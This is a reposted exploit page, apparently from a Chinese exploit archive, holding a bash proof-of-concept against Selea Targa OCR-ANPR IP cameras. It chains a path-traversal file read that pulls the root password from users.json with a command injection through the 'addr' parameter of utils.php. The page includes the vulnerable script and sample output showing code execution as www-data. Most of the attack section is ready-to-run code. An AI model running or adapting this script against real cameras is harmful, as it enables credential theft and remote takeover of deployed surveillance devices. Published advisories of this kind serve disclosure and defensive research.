扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 |
# Exploit Title: Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated) # Date: 07.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.selea.com #!/bin/bash # # Selea Targa IP OCR-ANPR Camera Unauthenticated Remote Code Execution # # # Vendor: Selea s.r.l. # Product web page: https://www.selea.com # Affected version: Model: iZero #Targa 512 #Targa 504 #Targa Semplice #Targa 704 TKM #Targa 805 #Targa 710 INOX #Targa 750 #Targa 704 ILB # Firmware: BLD201113005214 # BLD201106163745 # BLD200304170901 # BLD200304170514 # BLD200303143345 # BLD191118145435 # BLD191021180140 # BLD191021180140 # CPS: 4.013(201105) #3.100(200225) #3.005(191206) #3.005(191112) # # Summary: IP camera with optical character recognition (OCR) software for automatic # number plate recognition (ANPR) also equipped with ADR system that enables it to read # the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number # of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number # plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes # this camera suitable for all installation conditions. Its built-in OCR software works # as an automatic and independent system without the need of a computer, thus giving # autonomy to the device even in the event of an interruption in the connection between # the camera and the operations centre. # # Desc: Selea suffers from an authenticated command injection vulnerability. This can be # exploited to inject and execute arbitrary shell commands as the www-data user through # the 'addr' and 'port' HTTP GET parameters in utils.php page. Chaining the unauthenticated # LFI issue an attacker can grab credentials, authenticate and execute system commands. # # ===================================================================================== # /mnt/app/scripts/address_check.sh: # ---------------------------------- # # 01: #!/bin/sh # 02: . /mnt/app/scripts/env.sh # 03: . /mnt/app/scripts/log.sh # 04: # 05: CMD="$1" # 06: ADDR="$2" # 07: PORT="$3" # 08: # 09: if [ "$CMD" == "ping" ]; then # 10: RESULT=$(/bin/ping -I eth0 -W 1 -q -c 1 "$ADDR" 2>&1 ) # 11: elif [ "$CMD" == "port" ]; then # 12: log "/usr/bin/nc -w 1 -v -z $ADDR $PORT" # 13: RESULT=$(/usr/bin/nc -w 1 -v -z "$ADDR" "$PORT" 2>&1 ) # 14: fi # 15: # 16: echo -e "$RESULT" # # ===================================================================================== # # Tested on: GNU/Linux 3.10.53 (armv7l) #PHP/5.6.22 #selea_httpd #HttpServer/0.1 #SeleaCPSHttpServer/1.1 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2021-5620 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5620.php # # # 07.11.2020 # # # PoC chained exploit (as admin): # # solidsnake@metalgear:~/prive$ ./selea.sh 192.168.1.17 id # Password found: testingus # Using Authorization: YWRtaW46dGVzdGluZ3VzCg== # Using command: id # uid=33(www-data) gid=33(www-data) groups=33(www-data) # # IP=$1 CMD=$2 PWD=<code>curl -s http://${IP}/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json |grep -oP 'root_pwd": "\K.*?(?=",)' echo 'Password found: '${PWD} AUTH=$(echo admin:${PWD} | base64) echo 'Using Authorization: '${AUTH} echo 'Using command: '${CMD} curl -s "http://${IP}/cgi-bin/utils.php?cmd=addr_check&addr=1.3.3.7\$(${CMD})&type=port&port=80" -H "Authorization: Basic ${AUTH}" |grep -oP '1.3.3.7\K.*?(?=")' |
体验盒子
